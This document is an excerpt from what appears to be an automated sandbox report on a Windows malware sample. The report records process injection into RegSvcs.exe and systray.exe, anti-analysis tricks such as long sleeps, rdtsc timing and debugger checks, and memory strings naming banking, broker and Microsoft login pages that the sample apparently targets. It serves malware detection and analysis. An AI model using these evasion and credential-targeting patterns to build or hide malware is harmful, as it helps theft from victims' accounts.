                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe Process information set: NOOPENFILEERRORBOX (43 occurrences)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (191 occurrences)
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systray.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: MN1qo2qaJmEvXDP.exe PID: 6340, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: rlJvZXSinaRi.exe PID: 7184, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E2D324
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E2D7E4
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E2D944
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E2D504
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E2D544
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E2D1E4
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E30154
                Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FFEA3E2DA44
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 940000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 2640000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 4640000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 4C20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 5C20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 5D50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 6D50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: 9980000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: A980000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: AE10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: BE10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 1600000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 3100000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 3010000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 5680000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 6680000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 67B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 77B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: 9F90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: AF90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: BF90000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D096E rdtsc
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2915
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2428
                Source: C:\Windows\SysWOW64\systray.exe | Window / User API: threadDelayed 1369
                Source: C:\Windows\SysWOW64\systray.exe | Window / User API: threadDelayed 8604
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.2 %
                Source: C:\Windows\SysWOW64\systray.exe | API coverage: 2.8 %
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe TID: 6416 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6296 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2036 | Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3436 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe TID: 7312 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688 | Thread sleep count: 1369 > 30
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688 | Thread sleep time: -2738000s >= -30000s
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688 | Thread sleep count: 8604 > 30
                Source: C:\Windows\SysWOW64\systray.exe TID: 7688 | Thread sleep time: -17208000s >= -30000s
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe TID: 7712 | Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe TID: 7712 | Thread sleep time: -40500s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00ACC730 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Thread delayed: delay time: 922337203685477
                Source: H846yjBj.19.dr | Binary or memory string: interactivebrokers.comVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: outlook.office.comVMware20,11696508427s
                Source: H846yjBj.19.dr | Binary or memory string: discord.comVMware20,11696508427f
                Source: H846yjBj.19.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
                Source: H846yjBj.19.dr | Binary or memory string: ms.portal.azure.comVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
                Source: H846yjBj.19.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
                Source: H846yjBj.19.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4780967354.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss/x
                Source: H846yjBj.19.dr | Binary or memory string: outlook.office365.comVMware20,11696508427t
                Source: H846yjBj.19.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                Source: H846yjBj.19.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                Source: H846yjBj.19.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                Source: H846yjBj.19.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                Source: H846yjBj.19.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                Source: H846yjBj.19.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                Source: H846yjBj.19.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
                Source: firefox.exe, 00000017.00000002.2918452988.000001BFAA7FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
                Source: H846yjBj.19.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                Source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                Source: H846yjBj.19.dr | Binary or memory string: tasks.office.comVMware20,11696508427o
                Source: H846yjBj.19.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                Source: H846yjBj.19.dr | Binary or memory string: global block list test formVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: dev.azure.comVMware20,11696508427j
                Source: H846yjBj.19.dr | Binary or memory string: bankofamerica.comVMware20,11696508427x
                Source: H846yjBj.19.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
                Source: H846yjBj.19.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                Source: H846yjBj.19.dr | Binary or memory string: turbotax.intuit.comVMware20,11696508427t
                Source: H846yjBj.19.dr | Binary or memory string: AMC password management pageVMware20,11696508427
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\systray.exe | Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D096E rdtsc
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00417853 LdrLoadDll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01764164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01728158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01724144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01724144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01696154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0168C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016C0124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01750115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0173A118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0173A118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0173E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0173E10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017661E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016C01F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0170E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0170E1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017561C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D0185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0171019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01734180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0174C188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0168A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016BC073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01716050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01692050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01726030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0168A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0168C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01714000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016AE016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016980E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0168A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017160E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0168C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D20F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017120DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016880A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017560B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017560B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017280A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0169208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0173437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01738350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0175A352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0171035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0171035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176634F mov eax, dword ptr fs:[00000030h]10_2_0176634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov eax, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov ecx, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov eax, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov eax, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA30B mov eax, dword ptr fs:[00000030h]10_2_016CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA30B mov eax, dword ptr fs:[00000030h]10_2_016CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA30B mov eax, dword ptr fs:[00000030h]10_2_016CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168C310 mov ecx, dword ptr fs:[00000030h]10_2_0168C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B0310 mov ecx, dword ptr fs:[00000030h]10_2_016B0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C63FF mov eax, dword ptr fs:[00000030h]10_2_016C63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE3F0 mov eax, dword ptr fs:[00000030h]10_2_016AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE3F0 mov eax, dword ptr fs:[00000030h]10_2_016AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE3F0 mov eax, dword ptr fs:[00000030h]10_2_016AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017343D4 mov eax, dword ptr fs:[00000030h]10_2_017343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017343D4 mov eax, dword ptr fs:[00000030h]10_2_017343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov eax, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov eax, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov ecx, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov eax, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017163C0 mov eax, dword ptr fs:[00000030h]10_2_017163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174C3CD mov eax, dword ptr fs:[00000030h]10_2_0174C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E388 mov eax, dword ptr fs:[00000030h]10_2_0168E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E388 mov eax, dword ptr fs:[00000030h]10_2_0168E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E388 mov eax, dword ptr fs:[00000030h]10_2_0168E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B438F mov eax, dword ptr fs:[00000030h]10_2_016B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B438F mov eax, dword ptr fs:[00000030h]10_2_016B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688397 mov eax, dword ptr fs:[00000030h]10_2_01688397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688397 mov eax, dword ptr fs:[00000030h]10_2_01688397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688397 mov eax, dword ptr fs:[00000030h]10_2_01688397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
